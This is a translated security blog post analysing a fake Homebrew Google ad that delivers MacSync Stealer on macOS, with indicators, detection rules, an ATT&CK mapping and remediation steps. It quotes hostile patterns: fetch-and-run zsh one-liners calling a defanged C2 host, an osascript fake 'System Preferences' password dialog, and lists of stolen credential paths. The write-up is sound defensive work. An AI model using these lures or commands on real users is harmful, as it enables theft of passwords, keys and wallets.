Translated from the original Japanese article
Tech 12 min read

Fake Homebrew Google ad: MacSync Stealer's 3-stage zsh to Keychain via osascript

Security macOS Google Malware
IkesanContents

TL;DR

What happened 2026-04-30: a Google sponsored ad for “Homebrew” landed users on sites.google[.]com/view/brewpage, a fake Homebrew page that asked them to paste a 225-byte zsh into Terminal. SANS ISC’s Brad Duncan published the infection chain on 2026-05-01.

Infection chain 225-byte zsh → 1,448-byte stage 2 over plain HTTP + 2,647-byte stage 3 from inline Base64 → osascript shows a fake “System Preferences” dialog → Keychain, browsers, wallets, .ssh/.aws/.kube zipped to /tmp/osalogging.zip → POSTed to glowmedaesthetics[.]com over HTTP.

What to grep ~/.zsh_history for curl http://glowmedaesthetics[.]com/curl/..., /tmp/osalogging.zip, /tmp/sync[0-9]{7}/ directories, co-occurring osascript + curl processes, any DNS/HTTP traffic to glowmedaesthetics[.]com.

What to do Cut the affected machine off the network. Then, from a known-clean device, in this order:

  1. Reset the macOS login password (the fake dialog validated against dscl . authonly, so treat the password as captured)
  2. Reset Keychain entries (login-password compromise unlocks Keychain)
  3. Rotate SSH keys
  4. Rotate GitHub / npm / cloud (AWS/GCP/Azure) tokens, kubeconfig, browser-synced sessions
  5. Reset crypto wallet seeds
  6. Wipe and reinstall macOS on the infected device

Search “Homebrew” on Google and the sponsored ad shows above the real brew.sh.
That ad sends users to a fake Homebrew page that hands out a 225-byte zsh one-liner to paste into Terminal, which fans out into a 3-stage chain that deploys MacSync Stealer.

SANS Internet Storm Center’s Brad Duncan observed this malicious ad on 2026-04-30 and published the infection chain, three SHA256 hashes, and the C2 domain on 2026-05-01.
A developer who searches “how to install brew” gets walked from ad click → Google Sites → short zsh paste → Base64 expansion → fake osascript password dialog → ZIP exfiltration in a single straight line.

From sponsored ad to Google Sites fake page

In the SANS ISC observation, the search-result ad routed through a google[.]com/aclk?sa=L&ai=... click-tracking URL and landed on sites.google[.]com/view/brewpage.
Google Sites is a free, legitimate Google service, so the domain itself looks like a path under google.com.
If you rely on https:// and the padlock icon to spot phishing, there’s nothing to flag here — the domain genuinely sits inside Google.

The fake page is built to look like Homebrew’s real install page.
SANS ISC’s screenshots show the layout, copy-button position, and CTA all matching the real brew.sh.

The real Homebrew site is brew.sh, and the official install command reads raw.githubusercontent.com/Homebrew/install/HEAD/install.sh.
Homebrew’s own documentation says the installer explains what it does before running and asks for confirmation before starting.

The fake page only mimics the appearance of curl + zsh — the surface form, not the source URL.
Developers paste curl ... | sh one-liners from official sites all the time, so a page reached through an ad slots into the same muscle memory and the paste happens without friction.

Malvertising aimed at developers is not new.
This blog previously covered the GitHub Repo Squatting attack, which used Google ads and lookalike domains around GitHub Desktop.
This time the Homebrew install procedure itself is wired into the attack chain.

The 3-stage zsh: 225 bytes → 1,448 bytes → 2,647 bytes

The three SHA256 hashes SANS ISC uploaded to VirusTotal map out the chain.
The first thing pasted is a 225-byte zsh; from there a 1,448-byte stage 2 and a 2,647-byte stage 3 unfold.

StageSizeSHA256 (first 16 chars)Role
1225 bytesa4fcfecc5ac8fa57Initial zsh copy-pasted from the fake page. Short enough to slip past signature-based detection
21,448 bytes0d58616c750fc853Main zsh body, fetched over HTTP from hxxp[:]//glowmedaesthetics[.]com/curl/63810ee8...237d
32,647 bytes86d0c50cab4f394czsh expanded from a Base64 blob embedded in stage 1. Pipes an AppleScript payload into osascript

Stage 1 stays small to fit the copy-button delivery method.
A long command would raise eyebrows or get partially read while pasted, so only a launcher like curl ... | base64 -D | zsh is shown in the open — the actual body either lives elsewhere or hides in the script’s own Base64 block.

flowchart TD
  A["Google search<br/>Homebrew"] --> B["Sponsored ad<br/>aclk?sa=L"]
  B --> C["sites.google.com<br/>/view/brewpage"]
  C --> D["Paste 225B zsh<br/>into Terminal"]
  D --> E["curl http://<br/>glowmedaesthetics.com/curl/..."]
  D --> F["base64 -D | zsh<br/>on inline blob"]
  E --> G["Stage 2 zsh 1,448B"]
  F --> H["Stage 3 zsh 2,647B"]
  G --> I["Pipe AppleScript<br/>into osascript"]
  H --> I
  I --> J["Fake System Preferences<br/>password dialog"]
  J --> K["Create /tmp/osalogging.zip"]
  K --> L["HTTP POST to<br/>glowmedaesthetics.com"]

The C2 distribution URL runs over plain http, not HTTPS.
A curl/{long-hash} path over unencrypted HTTP leaves obvious traces in corporate proxies, EDR network logs, and DNS-based threat feeds.

osascript and the fake “System Preferences” dialog

The AppleScript that zsh feeds in is ultimately executed in memory by osascript.
Cognisys Group Labs’ analysis of MacSync identifies a getpwd() function inside this AppleScript that’s responsible for collecting the macOS account password.

display dialog "Required Application Helper..." ¬
    with title "System Preferences" ¬
    with icon file "...LockedIcon.icns" ¬
    default answer "" with hidden answer

The title says “System Preferences” and the icon uses the genuine LockedIcon.icns.
Visually it’s indistinguishable from a real macOS system authentication prompt — no cue points back to the Terminal as the originator.

The entered password is validated through dscl . authonly, the native macOS local-account password-check API, and the dialog loops until the validation passes.
From the user’s side it looks like macOS itself just asked for the login password several times.
The moment the correct password is typed in, the validated string is handed straight to the attacker.

osascript is an Apple-signed binary that drives macOS automation and ships AppleScript hooks for many legitimate apps.
Blocking the binary itself in endpoint security would also kill automation tools, Adobe apps, and Microsoft Office’s scripting layer.
SOC Prime tracks higher-tier MacSync campaigns that never write the AppleScript to disk — they pipe the text fetched via curl straight into osascript -e or stdin, leaving no file-based artifact for on-disk scanners.

What gets stolen: browsers, Keychain, SSH keys, wallets

Cognisys Group Labs and Rhys Downing’s MacSync variant analyses list the collection targets concretely.

CategoryTargets
BrowsersChrome / Brave / Edge Cookies, Login Data, Web Data
Wallet extensionsMetaMask, Phantom, TronLink — Local Extension Settings and IndexedDB
Crypto appsLedger Live, Trezor Suite application directories
MessagingTelegram tdata/
Dev / ops~/.ssh, ~/.aws, ~/.kube, *.keychain-db
File extensions.wallet, .seed, .kdbx, .pem, .ovpn

Developer laptops hoard tokens for GitHub, npm, cloud providers, SSH, Docker, and CI.
Losing ~/.aws, ~/.kube, and ~/.ssh in one shot extends the blast radius from the individual user out into the org’s CI/CD pipelines and production environment.

The collected data is staged under /tmp/osalogging.zip or inside /tmp/sync[0-9]{7}/, zipped with ditto, and POSTed to the C2.
The filename osalogging is a literal osascript + logging mash-up — the artifact name itself broadcasts the AppleScript-driven nature of the operation.

MacSync Stealer: from Mac.c rebrand to the third wave

MacSync Stealer is a rebrand of Mac.c stealer, released by an actor called “Mentalpositive” in April 2025.
It launched as a MaaS (Malware-as-a-Service: monthly-subscription malware infrastructure rented to other criminals), and from July 2025 onward it picked up traction as one of the major macOS stealers alongside AMOS and Odyssey.

CIS (the organization running MS-ISAC, the Multi-State Information Sharing and Analysis Center for US state and local governments) has been tracking a MacSync campaign through 2026 aimed at SLTT (State, Local, Tribal, Territorial) macOS endpoints.
MS-ISAC’s MDBR (Malicious Domain Blocking and Reporting — DNS-level blocking service) alone has shut down over 2.5 million DNS requests and shared more than 1,000 IoCs (Indicators of Compromise).

Sophos X-Ops has been observing the third wave, which kicked off in February 2026, with distribution expanding to ClickFix CAPTCHAs, SEO poisoning (manipulating search results to push malicious pages to the top), and lures disguised as free e-books or utility apps.
Jamf Threat Labs reports a variant where the dropper is a Swift app signed and notarized with an Apple Developer ID — passing through Gatekeeper without warnings — in a dropper → external C2 → MacSync payload flow.

The “Google ad → Google Sites → zsh paste” line SANS ISC caught is one of several distribution channels that were operating in parallel inside this larger campaign as of April 2026.

Same fake Homebrew domain, different stealer: Cuckoo Stealer comparison

The fake Homebrew site pattern has been recycled by multiple stealers since early 2026.
Hive Pro’s February 2026 report covers a Cuckoo Stealer campaign that used typosquatted Homebrew lookalike domains (homabrews[.]org, brewsh[.]cx, brrewsh[.]org, brewmacos[.]com, brew[.]lat, brew[.]pages[.]dev, raw[.]brewsh[.]cx, braw[.]sh) and persisted via ~/Library/LaunchAgents/com.homebrew.brewupdater.plist.

Lining up the Cuckoo Stealer variant against the SANS ISC MacSync observation, the entry surface is shared (ClickFix-style copy-paste lure) but the back half differs.

ItemCuckoo Stealer (2026-01)MacSync (2026-04)
DistributionTyposquatted domainsGoogle sponsored ad + Google Sites
Initial executionCopy-button injects a curl (ClickFix)225-byte zsh paste
Credential captureRepeated dscl . authonly promptsosascript “System Preferences”-style dialog
Persistencecom.homebrew.brewupdater.plist LaunchAgentNone observed by SANS ISC (closer to a relay downloader)
C2Routes through 5[.]255[.]123[.]244glowmedaesthetics[.]com over HTTP

Between January’s Cuckoo Stealer and April’s MacSync, the lure is the same but the relay scripts, C2, and persistence are swapped for different infrastructure.
The “Homebrew” brand itself keeps getting reused as a foothold — the place attackers reliably get the first command executed on a macOS host.

Detection points and MITRE ATT&CK mapping

SOC Prime’s Sigma rules for MacSync Stealer flag the following behaviors across cmdline and file_event sources.

  • cmdline: Base64 string manipulation (base64 -D, echo of long alphanumeric blobs, direct pipe to zsh)
  • cmdline: curl + osascript invoked in the same session
  • file_event: .zip creation under /tmp/, especially named osalogging.zip or sync[0-9]{7} directories
  • file_event: creation of ~/Library/LaunchAgents/com.homebrew.* plists (shared with Cuckoo Stealer)
  • Network: plain http:// traffic to glowmedaesthetics[.]com, paths of the form /curl/{64-char hex}

Even on dev machines without EDR, plain macOS tools — fs_usage, opensnoop, tail -f /var/log/system.log — surface the /tmp/osalogging.zip creation and unusual osascript invocations.

Mapping the SOC Prime rules and the SANS ISC observation to MITRE ATT&CK:

TacticTechniqueBehavior
Initial AccessT1204.001 User Execution: Malicious LinkSponsored ad click
Initial AccessT1204.004 Malicious Copy and PasteCopy-paste lure on Google Sites
ExecutionT1059.004 Unix Shell3-stage zsh
ExecutionT1059.002 AppleScriptosascript shows the fake dialog
Credential AccessT1056.002 GUI Input Capture”System Preferences”-styled password prompt
DiscoveryT1592.002 Software Components DiscoveryEnumeration of browsers, wallet extensions, keychain
CollectionT1005 Data from Local System~/.ssh, ~/.aws, Keychain, wallet data
CollectionT1074.001 Local Data Staging/tmp/osalogging.zip, /tmp/sync[0-9]{7}/
ExfiltrationT1041 Exfiltration Over C2 ChannelHTTP POST to glowmedaesthetics[.]com

Confirming infection and rotating tokens

The real Homebrew installer is reached from brew.sh.
Skip search-ad results; open it from a bookmark or by typing the URL.

The official install command on that page looks like:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

When checking, look past the brew.sh label: verify that the fetch target inside the command is raw.githubusercontent.com/Homebrew/install/HEAD/install.sh, that the execution shell isn’t quietly switched to zsh, and that the payload isn’t hidden behind Base64.
On pages with a “Copy” button, the displayed string and the actual clipboard content can differ.
Paste into a plain text editor first and read what’s there before sending it to Terminal.

If the script was already pasted and run: cut the machine off the network, then grep ~/.zsh_history and ~/.bash_history for unfamiliar lines containing curl, zsh, base64 -D, or osascript.
The presence of /tmp/osalogging.zip, a /tmp/sync[0-9]{7}/ directory, or traffic logs to glowmedaesthetics[.]com constitutes a post-execution infection.

Developer machines store tokens for GitHub, npm, cloud providers, SSH, Docker, and CI.
Changing passwords from the infected machine just hands them right back, so do the rotation from a known-clean device: macOS login password, Keychain, SSH keys, GitHub/npm tokens, cloud keys (AWS/GCP/Azure), kubeconfig, browser-synced sessions, and crypto wallet seeds, in that order.
The Keychain is encrypted at rest, but if the attacker has captured the correct login password through dscl authonly, the same password unlocks the Keychain.
Start with the login password reset.

References